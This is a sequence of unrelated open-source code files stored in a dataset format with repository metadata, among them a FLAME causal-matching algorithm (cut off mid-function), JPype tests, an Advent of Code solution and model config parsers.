return ['+27831234%03s' % i for i in xrange(1000)]
worker.get_contact_addrs_for_conv = generate_contact_addrs
worker.send_inbound_push_trigger = lambda to_addr, conversation: None
yield worker.send_jsbox(self.user_helper.account_key, conv.key, 1000)
self.assertEqual(worker.stdout.getvalue(), ''.join([
'Messages sent: 100 / 1000\n',
'Messages sent: 200 / 1000\n',
'Messages sent: 300 / 1000\n',
'Messages sent: 400 / 1000\n',
'Messages sent: 500 / 1000\n',
'Messages sent: 600 / 1000\n',
'Messages sent: 700 / 1000\n',
'Messages sent: 800 / 1000\n',
'Messages sent: 900 / 1000\n',
'Messages sent: 1000 / 1000\n',
]))
| true | true |
1c3c971c42ddcc733dc1be76b59663b71a00c80c | 948 | py | Python | tests/gold_tests/post_error/create_post_body.py | zhangzhongkui/http-over-http | 18e27573e3338ee797648c44d7e01114e1d3321c | [
"Apache-2.0"
] | null | null | null | tests/gold_tests/post_error/create_post_body.py | zhangzhongkui/http-over-http | 18e27573e3338ee797648c44d7e01114e1d3321c | [
"Apache-2.0"
] | 2 | 2017-03-14T02:29:31.000Z | 2017-09-22T22:11:35.000Z | tests/gold_tests/post_error/create_post_body.py | zhangzhongkui/http-over-http | 18e27573e3338ee797648c44d7e01114e1d3321c | [
"Apache-2.0"
] | 1 | 2021-02-15T08:09:17.000Z | 2021-02-15T08:09:17.000Z | '''
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
post_body = str(123456).zfill(1024)
postfile = open("postbody", "w")
for x in range(0, 3000):
postfile.write(post_body)
postfile.close()
| 37.92 | 75 | 0.744726 |
post_body = str(123456).zfill(1024)
postfile = open("postbody", "w")
for x in range(0, 3000):
postfile.write(post_body)
postfile.close()
| true | true |
1c3c9765d3a2070ba96ffc8effcb94d0d13baea5 | 4,400 | py | Python | rc/utils/argsParser.py | RowitZou/Q-Net | d1637c8164f807d51f2185c4f06515b7ac2e029c | [
"MIT"
] | 6 | 2019-02-13T07:00:25.000Z | 2020-12-04T06:28:41.000Z | rc/utils/argsParser.py | RowitZou/RNet-PGNet | d1637c8164f807d51f2185c4f06515b7ac2e029c | [
"MIT"
] | 1 | 2018-11-25T12:33:28.000Z | 2018-11-25T12:33:28.000Z | rc/utils/argsParser.py | RowitZou/Q-Net | d1637c8164f807d51f2185c4f06515b7ac2e029c | [
"MIT"
] | 1 | 2021-06-22T13:27:27.000Z | 2021-06-22T13:27:27.000Z | # -*- coding: utf8 -*-
import argparse
################################################################################
# ArgParse and Helper Functions #
################################################################################
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--trainset', type=str, default=None, help='Training set')
parser.add_argument('--devset', type=str, default=None, help='Dev set')
parser.add_argument('--testset', type=str, default=None, help='Test set')
parser.add_argument('--dir', type=str, default=None, help='Set the name of the models directory for this session.')
parser.add_argument('--pretrained', type=str, default=None, help='Specify pretrained models directory.')
parser.add_argument('--random_seed', type=int, default=123, help='Random seed')
parser.add_argument('--n_history', type=int, default=0)
parser.add_argument('--min_freq', type=int, default=1)
parser.add_argument('--split_history', type=str2bool, default=False)
group = parser.add_argument_group('model_spec')
group.add_argument('--max_word_length', type=int, default=5, help='Set maximum word length.')
group.add_argument('--embed_file', type=str, default=None)
group.add_argument('--embed_size', type=int, default=None)
group.add_argument('--embed_type', type=str, default='glove', choices=['glove', 'word2vec', 'fasttext'])
group.add_argument('--hidden_size', type=int, default=120, help='Set hidden size.')
group.add_argument('--rnn_hidden_size', type=int, default=120, help='Set sentence encoder hidden size.')
group.add_argument('--sent_rnn_layers', type=int, default=3, help='Set sentence RNN encoder layers.')
group.add_argument('--sum_loss', type=str2bool, default=False, help="Set the type of loss.")
group.add_argument('--fix_embeddings', type=str2bool, default=True, help='Whether to fix embeddings.')
group.add_argument('--dropout_rnn', type=float, default=0.3, help='Set RNN dropout in reader.')
group.add_argument('--dropout_emb', type=float, default=0.5, help='Set dropout for all feedforward layers.')
group.add_argument('--use_multi_gpu', type=str2bool, default=False, help='Whether to use multiple gpus.')
group.add_argument('--use_elmo', type=str2bool, default=True, help='Whether to use elmo word embeddings.')
group.add_argument('--elmo_fine_tune', type=str2bool, default=False, help="Whether to fine-tune the elmo model.")
group.add_argument('--elmo_options', type=str, default='elmo/elmo_options_512.json')
group.add_argument('--elmo_weights', type=str, default='elmo/elmo_weights_512.hdf5')
# Optimizer
group = parser.add_argument_group('training_spec')
group.add_argument('--optimizer', type=str, default='adamax', help='Set optimizer.')
group.add_argument('--learning_rate', type=float, default=0.1, help='Set learning rate for SGD.')
group.add_argument('--grad_clipping', type=float, default=10.0, help='Whether to use grad clipping.')
group.add_argument('--weight_decay', type=float, default=0.0, help='Set weight decay.')
group.add_argument('--momentum', type=float, default=0.0, help='Set momentum.')
group.add_argument('--batch_size', type=int, default=32, help='Set batch size.')
group.add_argument('--max_epochs', type=int, default=20, help='Set number of total epochs.')
group.add_argument('--verbose', type=int, default=100, help='Print every X batches.')
group.add_argument('--shuffle', type=str2bool, default=True,
help='Whether to shuffle the examples during training.')
group.add_argument('--max_answer_len', type=int, default=15, help='Set max answer length for decoding.')
group.add_argument('--predict_train', type=str2bool, default=True, help='Whether to predict on training set.')
group.add_argument('--out_predictions', type=str2bool, default=True, help='Whether to output predictions.')
group.add_argument('--save_params', type=str2bool, default=True, help='Whether to save params.')
args = parser.parse_args()
# args denotes the dict of parameters
return vars(args)
| 61.971831 | 119 | 0.68 |
import argparse
| true | true |
1c3c9783b1a7b7ea4fe1f04b17ec8c19a6fe0284 | 498 | py | Python | exercise/Exercism/python/allergies/allergies.py | orca-j35/python-notes | 950e78f53c5eebe8a4ba0396d5470383cfa77e48 | [
"CNRI-Python"
] | 1 | 2021-05-08T16:04:09.000Z | 2021-05-08T16:04:09.000Z | exercise/Exercism/python/allergies/allergies.py | orca-j35/python-notes | 950e78f53c5eebe8a4ba0396d5470383cfa77e48 | [
"CNRI-Python"
] | null | null | null | exercise/Exercism/python/allergies/allergies.py | orca-j35/python-notes | 950e78f53c5eebe8a4ba0396d5470383cfa77e48 | [
"CNRI-Python"
] | 2 | 2021-03-04T18:10:48.000Z | 2021-05-08T16:05:33.000Z | class Allergies(object):
items = {
'eggs': 1,
'peanuts': 2,
'shellfish': 4,
'strawberries': 8,
'tomatoes': 16,
'chocolate': 32,
'pollen': 64,
'cats': 128,
}
def __init__(self, score):
self._score = score
def is_allergic_to(self, item):
return bool(Allergies.items.get(item, 0) & self._score)
@property
def lst(self):
return [k for k, v in Allergies.items.items() if v & self._score]
| 22.636364 | 73 | 0.528112 | class Allergies(object):
items = {
'eggs': 1,
'peanuts': 2,
'shellfish': 4,
'strawberries': 8,
'tomatoes': 16,
'chocolate': 32,
'pollen': 64,
'cats': 128,
}
def __init__(self, score):
self._score = score
def is_allergic_to(self, item):
return bool(Allergies.items.get(item, 0) & self._score)
@property
def lst(self):
return [k for k, v in Allergies.items.items() if v & self._score]
| true | true |
1c3c987ff18f75bc78d577a2387d1cd2e1da6e79 | 574 | py | Python | logistica/commands/despacho_incluir_pendente.py | epiresdasilva/ecommerce-eventbridge | 33ec335ee2e946da7101a60746b6c3aa75f2a984 | [
"Apache-2.0"
] | 2 | 2021-10-30T01:32:04.000Z | 2021-11-06T20:22:39.000Z | logistica/commands/despacho_incluir_pendente.py | epiresdasilva/ecommerce-eventbridge | 33ec335ee2e946da7101a60746b6c3aa75f2a984 | [
"Apache-2.0"
] | null | null | null | logistica/commands/despacho_incluir_pendente.py | epiresdasilva/ecommerce-eventbridge | 33ec335ee2e946da7101a60746b6c3aa75f2a984 | [
"Apache-2.0"
] | null | null | null | import json
import boto3
client = boto3.client('events')
def main(event, context):
print("Despacho Incluir Pendencia: ", str(event["detail"]))
event_response = client.put_events(
Entries=[
{
'Source': 'DespachoIncluido',
'DetailType': 'Despacho Incluido',
'Detail': str(event["body"]),
'EventBusName': 'ecommerce-event-bridge-bus'
},
]
)
response = {
"statusCode": 200,
"body": json.dumps(event_response)
}
return response
| 20.5 | 63 | 0.533101 | import json
import boto3
client = boto3.client('events')
def main(event, context):
print("Despacho Incluir Pendencia: ", str(event["detail"]))
event_response = client.put_events(
Entries=[
{
'Source': 'DespachoIncluido',
'DetailType': 'Despacho Incluido',
'Detail': str(event["body"]),
'EventBusName': 'ecommerce-event-bridge-bus'
},
]
)
response = {
"statusCode": 200,
"body": json.dumps(event_response)
}
return response
| true | true |
1c3c98f9b4e64eb252bfe2dc0f227ef565664c46 | 633 | py | Python | database/order_history.py | rirwin/stock-analysis | d13b9be86265ad87c10847422a04f93409b0bf51 | [
"Apache-2.0"
] | null | null | null | database/order_history.py | rirwin/stock-analysis | d13b9be86265ad87c10847422a04f93409b0bf51 | [
"Apache-2.0"
] | 1 | 2020-06-24T04:41:59.000Z | 2020-06-24T04:41:59.000Z | database/order_history.py | rirwin/stock_analysis | d13b9be86265ad87c10847422a04f93409b0bf51 | [
"Apache-2.0"
] | null | null | null | from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column
from sqlalchemy import Float
from sqlalchemy import Integer
from sqlalchemy import String
Base = declarative_base()
class OrderHistory(Base):
__tablename__ = 'order_history'
user_id = Column(Integer, primary_key=True)
order_type = Column(String, primary_key=True)
date = Column(Integer, primary_key=True)
ticker = Column(String, primary_key=True)
num_shares = Column(Integer, primary_key=True)
price = Column(Float)
if __name__ == "__main__":
from database import db
Base.metadata.create_all(db.engine)
| 24.346154 | 55 | 0.758294 | from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column
from sqlalchemy import Float
from sqlalchemy import Integer
from sqlalchemy import String
Base = declarative_base()
class OrderHistory(Base):
__tablename__ = 'order_history'
user_id = Column(Integer, primary_key=True)
order_type = Column(String, primary_key=True)
date = Column(Integer, primary_key=True)
ticker = Column(String, primary_key=True)
num_shares = Column(Integer, primary_key=True)
price = Column(Float)
if __name__ == "__main__":
from database import db
Base.metadata.create_all(db.engine)
| true | true |
1c3c99725a0eeee266934c4830273f321e9b9aec | 4,857 | py | Python | day22/day22.py | lukasHD/adventOfCode2020 | fa171f3ad8232a0542d544d3de9b2b9d8fdf8ccd | [
"MIT"
] | null | null | null | day22/day22.py | lukasHD/adventOfCode2020 | fa171f3ad8232a0542d544d3de9b2b9d8fdf8ccd | [
"MIT"
] | null | null | null | day22/day22.py | lukasHD/adventOfCode2020 | fa171f3ad8232a0542d544d3de9b2b9d8fdf8ccd | [
"MIT"
] | null | null | null | import sys
import inspect
from codetiming import Timer
sys.path.insert(0, 'D:\\projects\\aoc2020\\')
from helper import loadingUtils, pretty
DAY = 22
def get_path():
return "day{:02d}".format(DAY)
def parse(in_arr):
p1 = []
p2 = []
player1 = True
for line in in_arr[1:]:
if line == "":
continue
if "Player" in line:
player1 = False
continue
try:
a = int(line)
if player1:
p1.append(a)
else:
p2.append(a)
except ValueError:
raise ValueError("smthg went wrong")
return p1, p2
def play(p1,p2, debug):
step = 1
while len(p1) > 0 and len(p2) > 0:
if debug: print("Round {:3}".format(step))
v1 = p1.pop(0)
v2 = p2.pop(0)
if v1 > v2:
if debug: print("Player 1 wins this round!")
p1.append(v1)
p1.append(v2)
else:
if debug: print("Player 2 wins this round!")
p2.append(v2)
p2.append(v1)
step += 1
if len(p1) == 0:
return p2
else:
return p1
def play_advanced(_p1, _p2, debug):
p1 = _p1.copy()
p2 = _p2.copy()
previous_rounds = []
step = 1
while len(p1) > 0 and len(p2) > 0:
if debug: print("Round {:3}".format(step))
#if debug: print(previous_rounds)
"""
Before either player deals a card, if there was a previous round in this game that
had exactly the same cards in the same order in the same players' decks, the game
instantly ends in a win for player 1. Previous rounds from other games are not
considered. (This prevents infinite games of Recursive Combat, which everyone agrees
is a bad idea.)
"""
hashed = str(p1) + ";" + str(p2)
if hashed in previous_rounds:
# declare P1 the winner
if debug: print("Player 1 is declared the winner! Stop infinity!")
return 1, p1
else:
previous_rounds.append(hashed)
"""
the players begin the round by each drawing the top card of their deck as normal.
"""
v1 = p1.pop(0)
v2 = p2.pop(0)
"""
If both players have at least as many cards remaining in their deck as the value
of the card they just drew, the winner of the round is determined by playing a new
game of Recursive Combat (see below).
Otherwise the winner of the round is the player with the higher-value card.
"""
if len(p1) >= v1 and len(p2) >= v2:
if debug: print("Recursive Combat")
new_p1 = p1.copy()[:v1]
new_p2 = p2.copy()[:v2]
winner, _ = play_advanced(new_p1, new_p2, debug)
#raise NotImplementedError
else:
if v1 > v2:
if debug: print("Player 1 wins this round!")
winner = 1
else:
if debug: print("Player 2 wins this round!")
winner = 2
"""
As in regular Combat, the winner of the round (even if they won the round by winning
a sub-game) takes the two cards dealt at the beginning of the round and places them on
the bottom of their own deck (again so that the winner's card is above the other card).
"""
if winner == 1:
p1.append(v1)
p1.append(v2)
else:
p2.append(v2)
p2.append(v1)
"""
If collecting cards by winning the round causes a player to have
all of the cards, they win, and the game ends.
"""
if len(p1) == 0:
return 2, p2
else:
return 1, p1
@Timer()
def run_part_1(in_file: str, debug: bool = False) -> int:
pretty.printHeader(DAY, 1, inspect.stack()[0].function, in_file)
result = 0
p1, p2 = parse(loadingUtils.importToArray(in_file))
print(p1)
print(p2)
winner = play(p1,p2, debug)
print(winner)
winner.reverse()
for i, v in enumerate(winner):
result += (i+1) * v
# code here
print("Result = {}".format(result))
return result
@Timer()
def run_part_2(in_file: str, debug: bool = False) -> int:
pretty.printHeader(DAY, 2, inspect.stack()[0].function, in_file)
result = 0
p1, p2 = parse(loadingUtils.importToArray(in_file))
_, winner = play_advanced(p1,p2, debug)
print(winner)
winner.reverse()
for i, v in enumerate(winner):
result += (i+1) * v
# code here
print("Result = {}".format(result))
return result
if __name__ == "__main__":
run_part_1(get_path() + "/test1", True)
run_part_1(get_path() + "/input1")
run_part_2(get_path() + "/test2", True)
run_part_2(get_path() + "/test1", True)
run_part_2(get_path() + "/input1")
| 30.936306 | 95 | 0.560222 | import sys
import inspect
from codetiming import Timer
sys.path.insert(0, 'D:\\projects\\aoc2020\\')
from helper import loadingUtils, pretty
DAY = 22
def get_path():
return "day{:02d}".format(DAY)
def parse(in_arr):
p1 = []
p2 = []
player1 = True
for line in in_arr[1:]:
if line == "":
continue
if "Player" in line:
player1 = False
continue
try:
a = int(line)
if player1:
p1.append(a)
else:
p2.append(a)
except ValueError:
raise ValueError("smthg went wrong")
return p1, p2
def play(p1,p2, debug):
step = 1
while len(p1) > 0 and len(p2) > 0:
if debug: print("Round {:3}".format(step))
v1 = p1.pop(0)
v2 = p2.pop(0)
if v1 > v2:
if debug: print("Player 1 wins this round!")
p1.append(v1)
p1.append(v2)
else:
if debug: print("Player 2 wins this round!")
p2.append(v2)
p2.append(v1)
step += 1
if len(p1) == 0:
return p2
else:
return p1
def play_advanced(_p1, _p2, debug):
p1 = _p1.copy()
p2 = _p2.copy()
previous_rounds = []
step = 1
while len(p1) > 0 and len(p2) > 0:
if debug: print("Round {:3}".format(step))
hashed = str(p1) + ";" + str(p2)
if hashed in previous_rounds:
if debug: print("Player 1 is declared the winner! Stop infinity!")
return 1, p1
else:
previous_rounds.append(hashed)
v1 = p1.pop(0)
v2 = p2.pop(0)
if len(p1) >= v1 and len(p2) >= v2:
if debug: print("Recursive Combat")
new_p1 = p1.copy()[:v1]
new_p2 = p2.copy()[:v2]
winner, _ = play_advanced(new_p1, new_p2, debug)
else:
if v1 > v2:
if debug: print("Player 1 wins this round!")
winner = 1
else:
if debug: print("Player 2 wins this round!")
winner = 2
if winner == 1:
p1.append(v1)
p1.append(v2)
else:
p2.append(v2)
p2.append(v1)
if len(p1) == 0:
return 2, p2
else:
return 1, p1
@Timer()
def run_part_1(in_file: str, debug: bool = False) -> int:
pretty.printHeader(DAY, 1, inspect.stack()[0].function, in_file)
result = 0
p1, p2 = parse(loadingUtils.importToArray(in_file))
print(p1)
print(p2)
winner = play(p1,p2, debug)
print(winner)
winner.reverse()
for i, v in enumerate(winner):
result += (i+1) * v
print("Result = {}".format(result))
return result
@Timer()
def run_part_2(in_file: str, debug: bool = False) -> int:
pretty.printHeader(DAY, 2, inspect.stack()[0].function, in_file)
result = 0
p1, p2 = parse(loadingUtils.importToArray(in_file))
_, winner = play_advanced(p1,p2, debug)
print(winner)
winner.reverse()
for i, v in enumerate(winner):
result += (i+1) * v
print("Result = {}".format(result))
return result
if __name__ == "__main__":
run_part_1(get_path() + "/test1", True)
run_part_1(get_path() + "/input1")
run_part_2(get_path() + "/test2", True)
run_part_2(get_path() + "/test1", True)
run_part_2(get_path() + "/input1")
| true | true |
1c3c99d4efde7cd5f8c65c16cfd8ad83ccc59284 | 486 | py | Python | cpab/cpaNd/model/_ScaleDependentLogPrior.py | freifeld/cpabDiffeo | 22df6cdbd7111b9ae3e7f1c0e31ff85e92d281a6 | [
"MIT"
] | 17 | 2016-03-16T21:35:36.000Z | 2021-11-11T04:16:21.000Z | cpab/cpaNd/model/_ScaleDependentLogPrior.py | freifeld/cpabDiffeo | 22df6cdbd7111b9ae3e7f1c0e31ff85e92d281a6 | [
"MIT"
] | null | null | null | cpab/cpaNd/model/_ScaleDependentLogPrior.py | freifeld/cpabDiffeo | 22df6cdbd7111b9ae3e7f1c0e31ff85e92d281a6 | [
"MIT"
] | 4 | 2016-08-12T23:02:09.000Z | 2019-03-14T18:20:36.000Z | #!/usr/bin/env python
"""
Created on Wed May 7 11:30:31 2014
Author: Oren Freifeld
Email: freifeld@csail.mit.edu
"""
from _ScaleDependentLogPriorGeneral import ScaleDependentLogPriorGeneral
#from of.utils import ipshell
#eps = 1e-16
class ScaleDependentLogPrior(ScaleDependentLogPriorGeneral):
def calc_lp(self,theta):
"""
Calculate log prior
"""
J = self.cpa_cov_inv
mu = self.mu
return -0.5 * (theta-mu).dot(J).dot(theta-mu) | 25.578947 | 72 | 0.674897 |
from _ScaleDependentLogPriorGeneral import ScaleDependentLogPriorGeneral
class ScaleDependentLogPrior(ScaleDependentLogPriorGeneral):
def calc_lp(self,theta):
J = self.cpa_cov_inv
mu = self.mu
return -0.5 * (theta-mu).dot(J).dot(theta-mu) | true | true |
1c3c9a1afd3f1280ce4b40416f23daa9e9bc7e3e | 382 | py | Python | packages/PIPS/validation/Gpu/scalar_passed_by_reference01.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 51 | 2015-01-31T01:51:39.000Z | 2022-02-18T02:01:50.000Z | packages/PIPS/validation/Gpu/scalar_passed_by_reference01.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 7 | 2017-05-29T09:29:00.000Z | 2019-03-11T16:01:39.000Z | packages/PIPS/validation/Gpu/scalar_passed_by_reference01.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 12 | 2015-03-26T08:05:38.000Z | 2022-02-18T02:01:51.000Z | from validation import vworkspace
with vworkspace() as w:
w.props.memory_effects_only = False
w.fun.main.scalarization()
w.fun.main.privatize_module()
w.fun.main.internalize_parallel_code()
w.fun.main.coarse_grain_parallelization()
w.fun.main.internalize_parallel_code()
w.fun.main.coarse_grain_parallelization()
w.fun.main.gpu_ify()
w.all_functions.display()
| 25.466667 | 43 | 0.774869 | from validation import vworkspace
with vworkspace() as w:
w.props.memory_effects_only = False
w.fun.main.scalarization()
w.fun.main.privatize_module()
w.fun.main.internalize_parallel_code()
w.fun.main.coarse_grain_parallelization()
w.fun.main.internalize_parallel_code()
w.fun.main.coarse_grain_parallelization()
w.fun.main.gpu_ify()
w.all_functions.display()
| true | true |
1c3c9b72ba406771030272645ee21c69e5951ecd | 2,899 | py | Python | test/jpypetest/test_classhints.py | pitmanst/jpype | 7256261e435b5c9309941c668258bebd1bcdff2d | [
"Apache-2.0"
] | 531 | 2018-07-19T03:30:04.000Z | 2022-03-29T16:52:44.000Z | test/jpypetest/test_classhints.py | pitmanst/jpype | 7256261e435b5c9309941c668258bebd1bcdff2d | [
"Apache-2.0"
] | 715 | 2018-07-18T09:21:01.000Z | 2022-03-24T17:45:49.000Z | test/jpypetest/test_classhints.py | pitmanst/jpype | 7256261e435b5c9309941c668258bebd1bcdff2d | [
"Apache-2.0"
] | 80 | 2018-07-18T13:10:55.000Z | 2022-03-31T19:47:16.000Z | # *****************************************************************************
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# See NOTICE file for details.
#
# *****************************************************************************
import jpype
import common
class MyImpl(object):
def blah(self):
pass
class ClassHintsTestCase(common.JPypeTestCase):
def setUp(self):
common.JPypeTestCase.setUp(self)
self.Custom = jpype.JClass("jpype.classhints.Custom")
self.ClassHintsTest = jpype.JClass("jpype.classhints.ClassHintsTest")
@jpype.JImplements("jpype.classhints.Custom")
class MyCustom(object):
def __init__(self, arg):
self.arg = arg
self.MyCustom = MyCustom
def testCharSequence(self):
Instant = jpype.JClass("java.time.Instant")
s = "2019-12-21T05:26:13.223189Z"
self.assertTrue(str(Instant.parse(s)), s)
def testInstant(self):
import datetime
now = datetime.datetime.utcnow()
Instant = jpype.JClass("java.time.Instant")
self.assertIsInstance(jpype.JObject(now, Instant), Instant)
def testPath(self):
import pathlib
JPath = jpype.JClass("java.nio.file.Path")
self.assertIsInstance(jpype.JObject(
pathlib.Path(__file__).absolute(), JPath), JPath)
def testFile(self):
import pathlib
JFile = jpype.JClass("java.io.File")
self.assertIsInstance(jpype.JObject(
pathlib.Path(__file__).absolute(), JFile), JFile)
def testConvertExact(self):
cht = self.ClassHintsTest
with self.assertRaises(TypeError):
cht.call("hello")
@jpype.JConversion(self.Custom, exact=str)
def StrToCustom(jcls, args):
return self.MyCustom(args)
cht.call("hello")
self.assertIsInstance(cht.input, self.MyCustom)
self.assertEqual(cht.input.arg, "hello")
def testConvertAttribute(self):
cht = self.ClassHintsTest
with self.assertRaises(TypeError):
cht.call(MyImpl())
@jpype.JConversion(self.Custom, attribute="blah")
def StrToCustom(jcls, args):
return self.MyCustom(args)
cht.call(MyImpl())
self.assertIsInstance(cht.input, self.MyCustom)
self.assertIsInstance(cht.input.arg, MyImpl)
| 32.943182 | 79 | 0.617109 |
import jpype
import common
class MyImpl(object):
def blah(self):
pass
class ClassHintsTestCase(common.JPypeTestCase):
def setUp(self):
common.JPypeTestCase.setUp(self)
self.Custom = jpype.JClass("jpype.classhints.Custom")
self.ClassHintsTest = jpype.JClass("jpype.classhints.ClassHintsTest")
@jpype.JImplements("jpype.classhints.Custom")
class MyCustom(object):
def __init__(self, arg):
self.arg = arg
self.MyCustom = MyCustom
def testCharSequence(self):
Instant = jpype.JClass("java.time.Instant")
s = "2019-12-21T05:26:13.223189Z"
self.assertTrue(str(Instant.parse(s)), s)
def testInstant(self):
import datetime
now = datetime.datetime.utcnow()
Instant = jpype.JClass("java.time.Instant")
self.assertIsInstance(jpype.JObject(now, Instant), Instant)
def testPath(self):
import pathlib
JPath = jpype.JClass("java.nio.file.Path")
self.assertIsInstance(jpype.JObject(
pathlib.Path(__file__).absolute(), JPath), JPath)
def testFile(self):
import pathlib
JFile = jpype.JClass("java.io.File")
self.assertIsInstance(jpype.JObject(
pathlib.Path(__file__).absolute(), JFile), JFile)
def testConvertExact(self):
cht = self.ClassHintsTest
with self.assertRaises(TypeError):
cht.call("hello")
@jpype.JConversion(self.Custom, exact=str)
def StrToCustom(jcls, args):
return self.MyCustom(args)
cht.call("hello")
self.assertIsInstance(cht.input, self.MyCustom)
self.assertEqual(cht.input.arg, "hello")
def testConvertAttribute(self):
cht = self.ClassHintsTest
with self.assertRaises(TypeError):
cht.call(MyImpl())
@jpype.JConversion(self.Custom, attribute="blah")
def StrToCustom(jcls, args):
return self.MyCustom(args)
cht.call(MyImpl())
self.assertIsInstance(cht.input, self.MyCustom)
self.assertIsInstance(cht.input.arg, MyImpl)
| true | true |
1c3c9b8fe0389b22672e4547b2a753df434c33c8 | 12,791 | py | Python | dame_flame/flame_algorithm.py | thowell332/DAME-FLAME-Python-Package | 860e7b0443903c0b79f3b214c359fdddb9718caf | [
"MIT"
] | null | null | null | dame_flame/flame_algorithm.py | thowell332/DAME-FLAME-Python-Package | 860e7b0443903c0b79f3b214c359fdddb9718caf | [
"MIT"
] | null | null | null | dame_flame/flame_algorithm.py | thowell332/DAME-FLAME-Python-Package | 860e7b0443903c0b79f3b214c359fdddb9718caf | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""The main file for the FLAME algorithm"""
# author: Neha Gupta, Duke University
# Copyright Duke University 2020
# License: MIT
import pandas as pd
import numpy as np
from . import grouped_mr
from . import dame_algorithm
from . import flame_dame_helpers
def decide_drop(all_covs, consider_dropping, prev_drop, df_all,
treatment_column_name, outcome_column_name, df_holdout_array,
adaptive_weights, alpha_given, df_unmatched, return_matches,
C, weight_array):
"""
This is a helper function, where we decide which covar to drop next
Args:
all_covs (array): Array of covar column names, not including treatment
and outcome columns.
consider_dropping (set): Covariate column names that have not yet
been dropped in a previous iteration
prev_drop (set): Covariate column names that have been dropped
in a previous iteration
"""
# This is where we decide who to drop, and also compute the pe
# value that gets outputted in the list described in readme.
best_drop = 0
best_mq = float("-inf")
best_return_matches = 0
best_matched_rows = 0
best_bf = 0
best_pe = 0
best_units_in_g = 0
if adaptive_weights == False:
# find the covariate that can be dropped with the minimum value in
# the weight array
min_covar_weight = 1
best_drop = 0
for poss_drop in consider_dropping:
index_in_all_covs = all_covs.index(poss_drop)
covar_weight = weight_array[index_in_all_covs]
if covar_weight < min_covar_weight:
min_covar_weight = covar_weight
best_drop = poss_drop
all_covs = set(all_covs)
covs_match_on = all_covs.difference([best_drop]).difference(prev_drop)
covs_match_on = list(covs_match_on)
# need to make sure we don't edit the mutable dataframes, then do match
df_all_temp = df_all.copy(deep=True)
return_matches_temp = return_matches.copy(deep=True)
matched_rows, return_matches, units_in_g = grouped_mr.algo2_GroupedMR(
df_all_temp, df_unmatched, covs_match_on, all_covs,
treatment_column_name, outcome_column_name, return_matches_temp)
# find the BF for this covariate set's match.
BF = flame_dame_helpers.compute_bf(matched_rows,
treatment_column_name, df_unmatched)
# todo: Update documentation to reflect there being no PE when using
# adaptive_weights=False, and also the verbose output.
return best_drop, 0, matched_rows, return_matches, BF, units_in_g
else:
for poss_drop in consider_dropping:
# S is the set of covars we drop. We try dropping each one
s = prev_drop.union([poss_drop])
PE = flame_dame_helpers.find_pe_for_covar_set(
df_holdout_array, treatment_column_name, outcome_column_name, s,
adaptive_weights, alpha_given)
# error check. PE can be float(0), but not denote error
if PE == False and type(PE) == bool:
return False, False, False, False, False
# The dropping criteria for FLAME is max MQ
# MQ = C * BF - PE
all_covs = set(all_covs)
covs_match_on = all_covs.difference([poss_drop]).difference(prev_drop)
covs_match_on = list(covs_match_on)
# need to make sure we don't edit the mutable dataframes, then do match
df_all_temp = df_all.copy(deep=True)
return_matches_temp = return_matches.copy(deep=True)
matched_rows, return_matches_temp, units_in_g = grouped_mr.algo2_GroupedMR(
df_all_temp, df_unmatched, covs_match_on, all_covs,
treatment_column_name, outcome_column_name, return_matches_temp)
# find the BF for this covariate set's match.
BF = flame_dame_helpers.compute_bf(
matched_rows, treatment_column_name, df_unmatched)
# Use the largest MQ as the covariate set to drop.
MQ = C * BF - PE
if MQ > best_mq:
best_mq = MQ
best_pe = PE
best_bf = BF
best_drop = poss_drop
best_return_matches = return_matches_temp
best_matched_rows = matched_rows
best_units_in_g = units_in_g
return best_drop, best_pe, best_matched_rows, best_return_matches, best_bf, best_units_in_g
def flame_generic(df_all, treatment_column_name, weight_array,
outcome_column_name, adaptive_weights, alpha, df_holdout,
repeats, want_pe, verbose, want_bf, missing_holdout_replace,
early_stops, pre_dame, C):
'''
All variables are the same as dame algorithm 1 except for:
pre_dame(False, integer): Indicates whether the algorithm will move to
DAME and after integer number of iterations.
'''
# Initialize variables. These are all moving/temporary throughout algo
all_covs = df_all.columns.tolist()
all_covs.remove(treatment_column_name)
all_covs.remove(outcome_column_name)
df_unmatched = df_all.copy(deep=True)
# The items getting returned
return_pe= [] # list of predictive errors,
return_bf = []
MG_units = [] # list of unit ids for each matched group
# weights indicates the number of times each unit appears in a group
weights = pd.DataFrame(np.zeros(shape=(len(df_all.index),1)),
columns = ['weights'],
index = df_all.index)
return_matches = pd.DataFrame(columns=all_covs, index=df_all.index)
# Initialize variables used in checking stopping criteria
orig_len_df_all = len(df_all) # Need this bc of case where repeats=False
orig_tot_treated = df_all[treatment_column_name].sum()
# As an initial step, we attempt to match on all covariates
covs_match_on = all_covs
matched_rows, return_matches, units_in_g = grouped_mr.algo2_GroupedMR(
df_all, df_unmatched, covs_match_on, all_covs, treatment_column_name,
outcome_column_name, return_matches)
if (len(units_in_g)) != 0:
# add the newly matched groups to MG_units, which tracks units in groups
MG_units = MG_units + units_in_g
# update unit weights for all units which appear in the new groups
# flatten to 1 list, then add occurrences of unique units
